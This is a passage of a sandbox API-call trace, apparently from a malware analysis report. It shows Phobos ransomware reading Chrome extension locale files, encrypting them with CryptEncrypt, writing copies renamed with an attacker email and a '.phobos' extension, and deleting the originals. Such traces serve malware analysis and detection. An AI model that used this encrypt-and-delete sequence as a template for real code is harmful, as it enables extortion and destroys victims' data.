lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf0, lpOverlapped=0x0) returned 1 [0160.924] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0160.924] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0160.924] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0160.924] CryptDestroyKey (hKey=0xa327e8) returned 1 [0160.924] WriteFile (in: hFile=0x130, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0160.924] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0160.924] CloseHandle (hObject=0x134) returned 1 [0160.925] CloseHandle (hObject=0x130) returned 1 [0160.925] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\messages.json")) returned 1 [0160.925] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0160.925] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0160.926] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=226) returned 1 [0160.926] CloseHandle (hObject=0x130) returned 1 [0160.926] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json")) returned 0x2020 [0160.926] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0160.926] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0160.926] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0160.926] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0160.926] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0160.926] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0160.927] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0160.927] ReadFile (in: hFile=0x130, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xe2, lpOverlapped=0x0) returned 1 [0160.928] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0, dwBufLen=0xf0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0) returned 1 [0160.928] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf0, lpOverlapped=0x0) returned 1 [0160.928] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0160.929] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0160.929] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0160.929] CryptDestroyKey (hKey=0xa327e8) returned 1 [0160.929] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0160.929] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0160.929] CloseHandle (hObject=0x130) returned 1 [0160.929] CloseHandle (hObject=0x134) returned 1 [0160.929] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json")) returned 1 [0160.930] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0160.930] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0160.930] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=242) returned 1 [0160.930] CloseHandle (hObject=0x134) returned 1 [0160.930] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json")) returned 0x2020 [0160.930] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0160.930] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0160.930] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0160.931] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0160.931] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0160.933] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0160.933] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0160.933] ReadFile (in: hFile=0x134, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xf2, lpOverlapped=0x0) returned 1 [0160.934] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x100, dwBufLen=0x100 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x100) returned 1 [0160.934] WriteFile (in: hFile=0x130, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x100, lpOverlapped=0x0) returned 1 [0160.935] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0160.935] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0160.935] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0160.935] CryptDestroyKey (hKey=0xa327e8) returned 1 [0160.935] WriteFile (in: hFile=0x130, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0160.935] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0160.935] CloseHandle (hObject=0x134) returned 1 [0160.935] CloseHandle (hObject=0x130) returned 1 [0160.935] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json")) returned 1 [0160.936] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0160.936] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0160.938] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=256) returned 1 [0160.938] CloseHandle (hObject=0x130) returned 1 [0160.938] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json")) returned 0x2020 [0160.938] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0160.938] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0160.938] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0160.938] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0160.938] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0160.939] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0160.939] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0160.939] ReadFile (in: hFile=0x130, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x100, lpOverlapped=0x0) returned 1 [0160.940] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x110, dwBufLen=0x110 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x110) returned 1 [0160.940] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x110, lpOverlapped=0x0) returned 1 [0160.940] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0160.940] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0160.940] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0160.940] CryptDestroyKey (hKey=0xa327e8) returned 1 [0160.940] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0160.941] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0160.941] CloseHandle (hObject=0x130) returned 1 [0160.941] CloseHandle (hObject=0x134) returned 1 [0160.941] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json")) returned 1 [0160.942] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0160.942] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0160.942] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=271) returned 1 [0160.942] CloseHandle (hObject=0x134) returned 1 [0160.942] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json")) returned 0x2020 [0160.942] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0160.942] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0160.943] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0160.943] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0160.943] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0160.943] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0160.943] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0160.943] ReadFile (in: hFile=0x134, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x10f, lpOverlapped=0x0) returned 1 [0160.944] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x110, dwBufLen=0x110 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x110) returned 1 [0160.944] WriteFile (in: hFile=0x130, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x110, lpOverlapped=0x0) returned 1 [0160.945] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0160.945] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0160.945] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0160.945] CryptDestroyKey (hKey=0xa327e8) returned 1 [0160.945] WriteFile (in: hFile=0x130, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0160.945] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0160.945] CloseHandle (hObject=0x134) returned 1 [0160.945] CloseHandle (hObject=0x130) returned 1 [0160.945] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json")) returned 1 [0160.946] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0160.946] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0160.947] GetFileSizeEx 